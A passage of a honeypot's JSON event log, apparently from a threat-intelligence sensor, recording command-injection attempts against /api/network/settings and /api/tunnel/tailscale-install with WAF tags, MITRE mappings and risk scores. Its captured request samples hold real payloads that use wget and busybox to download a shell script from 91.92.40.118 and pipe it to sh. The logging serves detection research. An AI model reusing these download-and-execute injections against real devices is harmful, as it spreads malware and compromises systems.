\u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":322},{"id":11809696,"ip":"45.153.34.252","ts":"2026-07-14 02:29:47.000000","proto":"tcp","src_port":38220,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":51,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022]","http_method":"POST","http_target":"\/api\/network\/settings","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00223f75be5a16a5bdf34f0b9aa0d9023c8d52bbfb9a\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 317, \u0022payload_entropy\u0022: 5.13830715012235, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00222e043609220034c4522b2f0d4bd3eeaf2eac744b\u0022, \u0022event_fingerprint\u0022: \u0022dfce62ac5913a9cd967b0bb645ceefa90bb28ac6\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00222fe604101c79ae7872c41cab5300a623\u0022, \u0022path_pattern_hash\u0022: \u00222b198f042c4b9cbc886c5fadc737cd96\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/network\/settings\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\\r\\nConnection: close\\r\\n\\r\\nhostname=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s russ;busybox wget http:\/\/91.92.40.118\/wget.s\u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/network\/settings\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\\r\\nConnection: close\\r\\n\\r\\nhostname=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s russ;busybox wget http:\/\/91.92.40.118\/wget.s\u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022198e566fb75422036b8a2c892fd6d3ed85a1a0e1\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/network\/settings\u0022, \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/network\/settings\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/network\/settings\u0022, \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/network\/settings\u0022, \u0022evidence_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":317},{"id":11809695,"ip":"45.153.34.252","ts":"2026-07-14 02:29:46.000000","proto":"tcp","src_port":38204,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":51,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022]","http_method":"POST","http_target":"\/api\/tunnel\/tailscale-install","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002271635acf52f08ec22ba63b1a86f3789b430e80ee\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 318, \u0022payload_entropy\u0022: 5.18528285066032, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00222e043609220034c4522b2f0d4bd3eeaf2eac744b\u0022, \u0022event_fingerprint\u0022: \u0022c54fb7f35b3fbc7acdbe90e113fd03091c71dee0\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022e9a7a43e0385345712c3599be5eaaae2\u0022, \u0022path_pattern_hash\u0022: \u002299cd8034277f5314e823702dbb3ebc6d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnect\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022cmd\\\u0022:\\\u0022`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s 9router;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|s\u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnect\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022cmd\\\u0022:\\\u0022`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s 9router;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|s\u0022, \u0022payload_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnect\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d72e808757bd636e05a7678745d2ffbe7117988b\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnect\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/tunnel\/tailscale-install\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 